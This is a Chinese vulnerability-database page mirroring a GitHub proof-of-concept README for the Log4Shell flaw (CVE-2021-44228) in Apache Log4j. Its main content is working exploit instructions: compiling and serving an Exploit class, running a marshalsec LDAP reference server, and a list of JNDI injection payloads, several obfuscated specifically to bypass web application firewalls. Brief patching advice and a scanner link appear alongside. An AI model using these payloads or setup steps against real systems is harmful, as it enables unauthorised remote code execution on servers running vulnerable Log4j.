漏洞平台

POC详情： b6feb9953e3c7712587d6eb51932577c6122ab0c

来源

https://github.com/kannthu/CVE-2021-44228-Apache-Log4j-Rce

关联漏洞

标题： Apache Log4j 代码问题漏洞 (CVE-2021-44228)
描述：Apache Log4j是美国阿帕奇（Apache）基金会的一款基于Java的开源日志记录工具。 Apache Log4J 存在代码问题漏洞，攻击者可设计一个数据请求发送给使用 Apache Log4j工具的服务器，当该请求被打印成日志时就会触发远程代码执行。

介绍

# CVE-2021-44228(Apache Log4j Remote Code Execution）

> [all log4j-core versions >=2.0-beta9 and <=2.14.1](https://logging.apache.org/log4j/2.x/security.html)

The version of 1.x have other vulnerabilities, we recommend that you update the latest version.

[Security Advisories / Bulletins linked to Log4Shell (CVE-2021-44228)](https://gist.github.com/SwitHak/b66db3a06c2955a9cb71a8718970c592)

### Usage:

```
git clone https://github.com/tangxiaofeng7/apache-log4j-poc.git
cd apache-log4j-poc/src/main/java
javac Exploit.java 
# For Python2
python -m SimpleHTTPServer 8888 
# For Python3
python3 -m http.server 8888
```

```
git clone https://github.com/mbechler/marshalsec.git
cd marshalsec
# Java 8 required
mvn clean package -DskipTests
cd target
java -cp marshalsec-0.0.3-SNAPSHOT-all.jar marshalsec.jndi.LDAPRefServer "http://127.0.0.1:8888/#Exploit"
```

Run the project finally,you will see your calculator from local.

Tips: 
> Do not rely on a current Java version to save you. Update Log4 (or remove the JNDI lookup). Disable the expansion (seems a pretty bad idea anyways).

### Bypass rc1
For example:
```
${jndi:ldap://127.0.0.1:1389/ badClassName}
```

### Bypass WAF
```
${${::-j}${::-n}${::-d}${::-i}:${::-r}${::-m}${::-i}://asdasd.asdasd.asdasd/poc}
${${::-j}ndi:rmi://asdasd.asdasd.asdasd/ass}
${jndi:rmi://adsasd.asdasd.asdasd}
${${lower:jndi}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:${lower:jndi}}:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${lower:n}${lower:d}i:${lower:rmi}://adsasd.asdasd.asdasd/poc}
${${lower:j}${upper:n}${lower:d}${upper:i}:${lower:r}m${lower:i}}://xxxxxxx.xx/poc}
```
> Don't trust the web application firewall.

### Details Of Vuln
Lookups provide a way to add values to the Log4j configuration at arbitrary places.

[Lookups](https://logging.apache.org/log4j/2.x/manual/lookups.html)

> The methods to cause leak in finally

```
LogManager.getLogger().error()
LogManager.getLogger().fatal()
```

### Simple Check Method
If you want to do black-box testing， I suggest you do passive scanning.

[BurpLog4jScan](https://github.com/tangxiaofeng7/BurpLog4j2Scan)

Have Fun!!!
![BurpLog4jScan.png](https://github.com/tangxiaofeng7/BurpLog4j2Scan/blob/master/img/result.png)

### Stargazers over time
[![Stargazers over time](https://starchart.cc/tangxiaofeng7/apache-log4j-poc.svg)](https://starchart.cc/tangxiaofeng7/apache-log4j-poc)

文件快照


 [4.0K]  /data/pocs/b6feb9953e3c7712587d6eb51932577c6122ab0c
├── [ 871]  log4j-rce.iml
├── [2.5K]  pom.xml
├── [2.3K]  README.md
└── [4.0K]  src
    └── [4.0K]  main
        └── [4.0K]  java
            ├── [ 553]  Exploit.java
            └── [ 460]  log4j.java

3 directories, 5 files

神龙机器人已为您缓存

备注

1. 建议优先通过来源进行访问。

2. 如果因为来源失效或无法访问，请发送邮箱到 f.jinxu#gmail.com 索取本地快照（把 # 换成 @）。

3. 神龙已为您对POC代码进行快照，为了长期维护，请考虑为本地POC付费，感谢您的支持。